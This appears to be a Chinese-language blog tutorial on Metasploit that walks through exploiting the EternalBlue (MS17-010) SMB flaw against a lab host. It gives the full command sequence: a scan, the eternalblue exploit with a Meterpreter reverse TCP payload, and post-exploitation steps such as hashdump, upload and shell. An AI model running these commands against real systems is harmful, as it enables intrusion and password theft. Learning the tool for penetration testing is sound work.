MSF

Metasploit(MSF)简介

Metasploit(MSF) 是一个开源的渗透测试开源软件,也是一个逐步发展成熟的漏洞研究与渗透测试代码开发平台,此外也将成为支持整个渗透测试过程的安全技术集成开发与应用环镜

永恒之蓝漏洞介绍

“永恒之蓝”是利用Windows系统的SMB漏洞可以获取系统最高权限。于2017年在全球的范围内大面积爆发,不法分子利用这个漏洞制作了勒索病毒,锁定被攻击的设备,并要求支付高额赎金。而MSF能快速对目标的实现“永恒之蓝”攻击,就是利用MSF中针对ms17-010漏洞的攻击载荷进行攻击,从而获取对目标主机的最高权限。“永恒之蓝”的原理主要是扫描所有开放445文件共享端口的Windows机器

Metasploit(MSF)模块介绍

综合渗透测试框架

Auxiliary  辅助模块 为渗透测试信息搜集提供了大量的辅助模块支持

Exploits  攻击模块 利用发现的安全漏洞或配置弱点对远程目标系统 进行攻击,从而获得对远程目标系统访问权的代码组件。

Payload  攻击载荷模块攻击成功后促使靶机运行的一段植入代码

Post  后渗透攻击模块收集更多信息或进一步访问被利用的目标系统

Encoders  编码模块将攻击载荷进行编码,来绕过防护软件拦截

MSF所用功能可分为这几个模块,每个模块都有各自的功能领域,形成了渗透测试的流程

开启MSF

开启数据库:service postgresqlstart 

初始化msf数据库:msfdb init 

开启MSF:msfconsole 

MSF-基础指令

简单好用的帮助指令

help/?             帮助菜单

exit                退出MSF控制台

Back               返回上一级

info                 显示一个或者多个模块的信息

show             显示所给类型的模块

background  将当前操作在后台运行

use               使用所选择的模块

set               设置选项

unset           取消设置的选项

session         会话

options         查看指令需要设置什么

MSF攻击基本流程

扫描靶机

msf>use auxiliary/scanner/smb/smb_ms17_010  options

设置目标地址:set  RHOSTS 192.168.174.1

设置目标地址:set  RPORT  445

扫描run/exploit

攻击靶机

use exploit/windows/smb/ms17_010_eternalblue options

设置目标地址:set RHOSTS 192.168.174.1

设置目标地址:set RPORT 445

选择payloadset payload windows/x64/meterpreter/reverse_tcp options

设置本地地址:set LHOST 192.168.174.23

攻击run/exploit

 

查看用户权限:meterpreter>getuid

获取hash密码:meterpreter>hashdump

上传文件:meterpreter>upload

文件名执行文件:meterpreter>execute -fnotepad.exe

获取屏幕截图:meterpreter>screenshot

获取shell:meterpreter>shell

posted @ 2022-09-17 12:54  清光照归途  阅读(486)  评论(0编辑  收藏  举报